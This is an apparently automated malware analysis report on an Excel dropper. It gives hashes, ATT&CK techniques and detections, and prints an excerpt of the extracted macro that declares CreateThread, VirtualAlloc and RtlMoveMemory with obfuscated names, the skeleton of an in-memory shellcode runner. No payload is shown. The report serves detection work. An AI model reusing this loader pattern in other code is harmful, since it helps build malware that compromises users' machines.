Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0640a8b8122dea4b…

MALICIOUS

Office (OLE)

Size: 29.5 KB
Created: 2018-01-16 12:08:00
Authoring application: Microsoft Excel
First seen: 2018-01-23
MD5: 5491db5b9314496f6a082c4374de6202
SHA-1: 6647b2e4638cbf7b6c4430face67f6d74ef165e1
SHA-256: 0640a8b8122dea4b40635c33969724384d9a56d2d8004eb7d28f53a890e6067b
Risk Score: 100

Malware Insights

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution
  • T1055 Process Injection

The critical ClamAV heuristic identifies this file as a dropper. The VBA macro contains calls to VirtualAlloc and CreateThread, indicating it is designed to allocate memory and execute arbitrary code. This functionality is commonly used by droppers to download and execute a second-stage payload.

Heuristics (3)

  • ClamAV: Doc.Dropper.Agent-6448896-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448896-0
  • Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC)
    The macro source references the VirtualAlloc API
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 1684 bytes
SHA-256: 8b043dd31ce779e3fddb7a4b06930a17a98731c0023fd070a2db19e3e205a9c4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Pmnfaukd As Long, ByVal Snddhhsj As Long, ByVal Izzvvrosu As LongPtr, Sntphtef As Long, ByVal Lrh As Long, Kmzta As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Mfbi As Long, ByVal Stveufhn As Long, ByVal Awrqgkeo As Long, ByVal Qyuqmovc As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Xyw As LongPtr, ByRef Ekupcyhxw As Any, ByVal Lhdeu As Long) As LongPtr
#Else
    Private Declare Function CreateThread Lib "kernel32" (ByVal Pmnfaukd As Long, ByVal Snddhhsj As Long, ByVal Izzvvrosu As Long, Sntphtef As Long, ByVal Lrh As Long, Kmzta As Long) As Long
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Mfbi As Long, ByVal Stveufhn As Long, ByVal Awrqgkeo As Long, ByVal Qyuqmovc As Long) As Long
    Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Xyw As Long, ByRef Ekupcyhxw As Any, ByVal Lhdeu As Long) As Long
#End If






Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"